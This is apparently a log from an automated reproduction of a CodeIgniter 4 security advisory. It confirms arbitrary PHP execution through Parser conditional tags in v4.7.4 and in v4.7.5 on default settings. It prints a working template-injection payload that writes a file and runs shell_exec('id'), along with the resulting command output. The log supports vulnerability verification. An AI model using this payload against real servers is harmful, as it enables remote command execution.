=== GHSA-4q58-jw8x-8cm7 reproduction === PHP 8.5.4 (cli) (built: Sep 2 2026 14:42:18) (NTS) Composer version 2.9.5 2026-01-29 11:40:53 PHP version 8.5.4 (/usr/bin/php8.5) Run the "diagnose" command to get more detailed diagnostics output. [*] vulnerable commit: 2bd0f01d2813f9ec06db42643ce39d9f5428bf6d (v4.7.4) [*] fixed commit: 36256090764badf4f9862378c55fcfa850405fe1 (v4.7.5) [+] patch-hunk sanity OK (vuln lacks fix, fixed has it) [+] POST /render endpoint installed in both apps [*] server pids: vuln=12160 fixed=12163 [+] both apps healthy (GET / -> 200) --- vulnerable app (v4.7.4, unrestricted Parser conditionals) --- HTTP_STATUS:200 [+] vuln attempt 1: arbitrary PHP executed (marker + id output in response) HTTP_STATUS:200 [+] vuln attempt 2: arbitrary PHP executed (marker + id output in response) --- fixed app (v4.7.5, restrictConditionals=true per render) --- HTTP_STATUS:500 [+] fixed-restricted attempt 1: payload neutralized HTTP_STATUS:500 [+] fixed-restricted attempt 2: payload neutralized --- fixed app (v4.7.5, default: conditionals UNRESTRICTED) --- HTTP_STATUS:200 [+] fixed-unrestricted attempt 1: still exploitable (advisory note confirmed) HTTP_STATUS:200 [+] fixed-unrestricted attempt 2: still exploitable (advisory note confirmed) --- vuln response excerpt --- uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) COND_BRANCH_OK --- fixed-restricted response excerpt --- PARSER_EXCEPTION: CodeIgniter\View\Exceptions\ViewException: The Parser conditional is not allowed in restricted mode: "{if (file_put_contents(getenv('PRUVA_MARKER_DIR').'/fixedr1.txt','GHSA-4q58-jw8x-8cm7 arbitrary PHP executed token=fixedr1-1791566101620736489')!==false) && print(shell_exec('id'))}" [*] runtime_manifest.json written, result=confirmed === RESULT: CONFIRMED - arbitrary PHP code execution via Parser conditional tags ===